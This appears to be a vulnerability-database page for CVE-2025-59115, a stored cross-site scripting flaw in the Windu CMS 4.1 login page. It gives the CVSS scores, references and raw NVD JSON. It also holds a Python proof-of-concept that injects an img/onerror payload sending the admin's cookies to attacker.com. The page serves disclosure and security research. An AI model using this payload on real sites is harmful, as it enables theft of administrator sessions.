CVE-2025-59115

Description

Windu CMS is vulnerable to Stored Cross-Site Scripting (XSS) in the logon page where input data has no proper validation. Malicious attacker can inject arbitrary HTML and JS into website, which will be rendered/executed when visiting logs page by admin. Only version 4.1 was tested and confirmed as vulnerable. This issue was fixed in version 4.1 build 2250.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:* - VULNERABLE

Windu CMS 4.1 (build < 2250)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-59115 PoC - Windu CMS Stored XSS in Login Page
# Target: Windu CMS <= 4.1 (before build 2250)

TARGET_URL = "http://target-site.com"  # Replace with target URL

# XSS payload to be injected in login form fields
XSS_PAYLOAD = '<img src=x onerror="fetch(\'http://attacker.com/steal?c=\'+document.cookie)">'

def exploit_stored_xss():
    """Inject XSS payload into Windu CMS login page"""
    login_url = f"{TARGET_URL}/login"
    
    # Login form data - inject XSS in any input field
    data = {
        'login': XSS_PAYLOAD,  # Username field
        'password': 'anypassword',
        'submit': 'Login'
    }
    
    try:
        response = requests.post(login_url, data=data, timeout=10)
        print(f"[*] Payload sent to {login_url}")
        print(f"[*] Status code: {response.status_code}")
        
        # When admin visits logs page, XSS will be triggered
        print("[*] XSS payload stored successfully")
        print("[*] Wait for admin to visit logs page at: /admin/logs")
        
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        sys.exit(1)

if __name__ == "__main__":
    print("CVE-2025-59115 Windu CMS Stored XSS PoC")
    print("=" * 50)
    exploit_stored_xss()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59115
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59115
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59115/
[4] VulDB https://vuldb.com/cve/CVE-2025-59115
[5] https://cert.pl/posts/2025/11/CVE-2025-59110
[6] https://windu.org

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59115", "sourceIdentifier": "[email protected]", "published": "2025-11-18T15:16:33.887", "lastModified": "2025-12-05T13:16:04.050", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Windu CMS is vulnerable to Stored Cross-Site Scripting (XSS) in the logon page where input data has no proper validation. Malicious attacker can inject arbitrary HTML and JS into website, which will be rendered/executed when visiting logs page by admin.\n\nOnly version 4.1 was tested and confirmed as vulnerable.\nThis issue was fixed in version 4.1 build 2250."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "614EBC19-889B-4FC0-8937-C52F415D4835"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/11/CVE-2025-59110", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://windu.org", "source": "[email protected]", "tags": ["Product"]}]}}